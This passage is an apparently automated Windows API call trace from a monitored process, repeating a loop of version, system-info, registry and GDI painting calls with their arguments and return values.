dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.172] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.172] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.172] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.172] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.172] BeginPath (hdc=0x0) returned 0 [0092.172] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.172] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.172] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.172] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.172] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.172] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.172] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.172] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.172] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.172] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.172] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.172] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.172] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.172] BeginPath (hdc=0x0) returned 0 [0092.172] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.172] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.172] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.172] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.172] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.172] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.173] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.173] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.173] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.173] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.173] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.173] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.173] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.173] BeginPath (hdc=0x0) returned 0 [0092.173] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.173] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.173] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.173] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.173] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.173] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.173] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.173] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.173] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.173] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.173] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.173] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.173] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.173] BeginPath (hdc=0x0) returned 0 [0092.173] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.173] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.173] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.173] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.173] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.173] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.174] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.174] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.174] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.174] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.174] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.174] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.174] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.174] BeginPath (hdc=0x0) returned 0 [0092.174] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.174] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.174] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.174] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.174] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.174] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.174] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.174] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.174] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.174] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.174] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.174] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.174] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.174] BeginPath (hdc=0x0) returned 0 [0092.175] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.175] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.175] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.175] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.175] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.175] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.175] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.175] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.175] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.175] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.175] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.175] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.175] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.175] BeginPath (hdc=0x0) returned 0 [0092.175] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.175] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.175] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.175] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.175] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.175] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.175] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.175] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.175] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.175] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.175] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.176] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.176] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.176] BeginPath (hdc=0x0) returned 0 [0092.176] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.176] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.176] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.176] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.176] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.176] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.176] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.176] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.176] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.176] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.176] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.176] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.176] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.176] BeginPath (hdc=0x0) returned 0 [0092.176] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.176] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.176] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.176] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.176] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.176] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.177] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.177] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.177] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.177] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.177] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.177] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.177] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.177] BeginPath (hdc=0x0) returned 0 [0092.177] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.177] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.177] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.177] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.177] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.177] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.177] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.177] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.177] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.177] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.177] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.177] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.177] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.177] BeginPath (hdc=0x0) returned 0 [0092.177] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.177] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.177] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.177] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.177] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.178] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.178] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.178] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.178] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.178] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.178] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.178] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.178] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.178] BeginPath (hdc=0x0) returned 0 [0092.178] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.178] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.178] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.178] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.178] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.178] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.178] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.178] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.178] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.178] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.178] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.178] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.178] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.178] BeginPath (hdc=0x0) returned 0 [0092.178] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.178] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.179] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.179] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.179] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.179] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.179] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.179] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.179] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.179] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.179] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.179] SelectObject 